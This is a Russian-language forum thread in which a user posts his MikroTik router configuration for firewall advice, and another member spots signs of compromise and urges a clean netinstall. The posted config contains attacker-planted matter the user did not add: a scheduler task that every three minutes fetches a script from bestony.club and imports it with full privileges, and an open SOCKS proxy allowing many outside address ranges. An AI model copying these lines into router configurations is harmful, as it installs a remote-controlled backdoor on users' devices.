Базовая настройка firewoll с нуля

[stanislav.nikolaevich]

Здравствуйте, хотел для себя немного поднатаскаться, почитал немного по этой теме и есть некоторые вопросы, ниже код, интересует раздел нат и огненная стена

Код: Выделить всё

/interface bridge
add name=bridge1
/interface pppoe-client
add add-default-route=yes disabled=no interface=ether1 name=pppoe-out1 \
    use-peer-dns=yes user=*
/interface l2tp-server
add name=l2tp-in1 user=*
/interface pptp-server
add disabled=yes name=pptp-in1 user=*
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
add authentication-types=wpa2-psk eap-methods="" management-protection=allowed \
    mode=dynamic-keys name=profile1 supplicant-identity=""
/interface wireless
set [ find default-name=wlan1 ] disabled=no mode=ap-bridge security-profile=\
    profile1 ssid=MikroTik
/ip pool
add name=dhcp_pool1 ranges=192.168.3.2-192.168.3.254
add name=vpn_pool1 ranges=10.10.5.1-10.10.5.100
/ip dhcp-server
add address-pool=dhcp_pool1 disabled=no interface=bridge1 name=dhcp1
/ppp profile
add local-address=vpn_pool1 name=pptp remote-address=vpn_pool1 use-encryption=\
    yes
add local-address=vpn_pool1 name=l2tp remote-address=vpn_pool1
add change-tcp-mss=yes name=lvpn use-compression=no use-encryption=no use-mpls=\
    no
/interface bridge port
add bridge=bridge1 interface=wlan1
add bridge=bridge1 interface=ether3
add bridge=bridge1 interface=ether4
add bridge=bridge1 interface=ether2
/interface l2tp-server server
set authentication=mschap2 default-profile=l2tp enabled=yes use-ipsec=yes
/interface pptp-server server
set authentication=mschap2 default-profile=pptp enabled=yes
/ip address
add address=192.168.3.2/24 interface=bridge1 network=192.168.3.0
/ip cloud
set ddns-enabled=yes
/ip dhcp-server network
add address=192.168.3.0/24 dns-server=192.168.3.2 gateway=192.168.3.2
/ip dns
set allow-remote-requests=yes
/ip firewall filter
add action=drop chain=input comment=invalid connection-state=invalid
add action=accept chain=input comment=established,related connection-state=\
    established,related
add action=accept chain=input comment="Vpn L2 IPSek" dst-port=500,4500,1701 \
    in-interface=pppoe-out1 protocol=udp
add action=accept chain=input comment=Winbox dst-port=8291 in-interface=\
    pppoe-out1 protocol=tcp
add action=accept chain=input comment=Ping in-interface=pppoe-out1 protocol=\
    icmp
add action=drop chain=input
    in-interface=pppoe-out1
add action=drop chain=forward comment=invalid connection-state=invalid
add action=accept chain=forward 
 connection-state=established,related connection-type=""
/ip firewall nat
add action=masquerade chain=srcnat out-interface=pppoe-out1
/ip route
add distance=1 gateway=192.168.3.2
add distance=1 dst-address=10.30.1.0/24 gateway=l2tp-in1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www address=192.168.3.0/24
set ssh disabled=yes port=43321
set api disabled=yes
set api-ssl disabled=yes
/ip socks
set port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add action=deny src-address=0.0.0.0/0
/ppp secret
add name=remote01 profile=l2tp service=l2tp
add disabled=yes name=* profile=pptp service=pptp
/system clock
set time-zone-name=Europe/Samara
/system package update
set channel=long-term
/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://bestony.club/poll/9286e\
    400-df43-4703-8e39-5bf88f38c232 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    dec/31/2020 start-time=18:45:48
/tool bandwidth-server
set authenticate=no

1)Нормальная ли настройка firewall ?
там есть add action=accept chain=forward
connection-state=established,related connection-type=""
байты и пакеты нулевые, как будто не работает, это нормально?
2)далее нет правил по forward например add chain=forward action=drop
блокирует интернет даже если я до пишу разрешение как то так add chain=forward action=accept in-interface=!pppoe-out1 out-interface=pppoe-out1.Примеры строк взяты из других конфигураций и применил.
Так надо ли блокировать forward? и как.
По кабелю приходит инет и тв Ростелеком.
3)Мне кажется что интернет тормозит и было лучше с обычным модемом, может я что то забыл?
Остальные вопросы по ходу хотел спросить, чтоб не наваливать

[stanislav.nikolaevich]

Кажется разобрался, был изначачальный глюк с правилом add action=accept chain=forward
connection-state=established,related connection-type="",удалил и снова завел, норм
другой вопрос
что за адреса из раздела
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
я не добавлял это

[denis1978]

Где Вы взяли эту железку? Б/у? Тогда полный сброс конфигурации. И настройка с нуля.

Если железка новая и socks прописан не Вами, Вас ломанули. Одна из любимых тем злоумышленников прописать свои носки. Решение такое же. Полный сброс микрота.

Да. И посмотрите есть ли что-либо в разделе scripts.


Upd. Стоп. А в шедулере что это? Это Ваше?

[stanislav.nikolaevich]

Где Вы взяли эту железку? Б/у? Тогда полный сброс конфигурации. И настройка с нуля.

Если железка новая и socks прописан не Вами, Вас ломанули. Одна из любимых тем злоумышленников прописать свои носки. Решение такое же. Полный сброс микрота.

Да. И посмотрите есть ли что-либо в разделе scripts.


Upd. Стоп. А в шедулере что это? Это Ваше?

Хе, ну это так валялся не нужным на работе, взял вспомнить былое ,поднатаскаться, интересно просто. Вообще я его сбрасывал, но он долгое время работал без fairwoll я пока вспоминал читал крч, по крупицам собирал инфу.
Почему я посмотрел в Socks,мне показалось странным что там есть адреса и в одной статье говорили лучше отключать, тобишь снимать галку enabled я снял как то,но может уже за это время пока читал кто то залез
Вообще в домашних условиях, просто ковыряюсь, смотрю что как для интереса.
И даже было такое что юзер админ и без пороля долго был)))

[denis1978]

Ваше устройство скомпрометировано.
Читайте в этом топике "чистая установка через netinstall".
Выполните эту операцию. Дальше поможем настроить.

[stanislav.nikolaevich]

Привет всем.
Задумался о том, а можно ли сделать вход на winbox по VPN?
Например в качестве защиты предлагают вводить Ip белый в available from
Как я понимаю можно ввести адрес например локалки пусть 192.168.4.0/24 и с другой сети не смогут зайти,ок,но зашедши по vpn я не могу зайти на микрот,добовлял пул из vpn в available from например 11.10.1.0/24 и 192.168.4.0/24 все равно .Предполагаю что надо в fairwoll что добавить разрешение,но какое,может кто то пример кинет.Статики нет,хожу через динамику,отсюда и задался вопросом а если разрешить через vpn

[denis1978]

Пробросте порт 8291. Если вы его не меняли конечно.
Вы устройство прошили через netinstall?

[stanislav.nikolaevich]

Пробросте порт 8291. Если вы его не меняли конечно.
Вы устройство прошили через netinstall?

Не,пока нет,да это чисто эксперементальная сеть,у меня нет там пересекающихся паролей,чем это грозит,от этого неправильно микротик может работать?Я другую тему продолжаю - доступ к vpn,потому как тут что то не отвечаили,а там начали довать советы

[denis1978]

Я бы первым делом перепрошил начисто.
У Вас в шедулере выполняется левый скрипт. Вы знаете что он делает?

[stanislav.nikolaevich]

Здравствуйте. Такой вопрос, если в firewall закрыто так



то будет ли обновляться корректно ip адрес, кажется нет

хотел добавить в разрешение ddns, подскажите какой порт или какие данные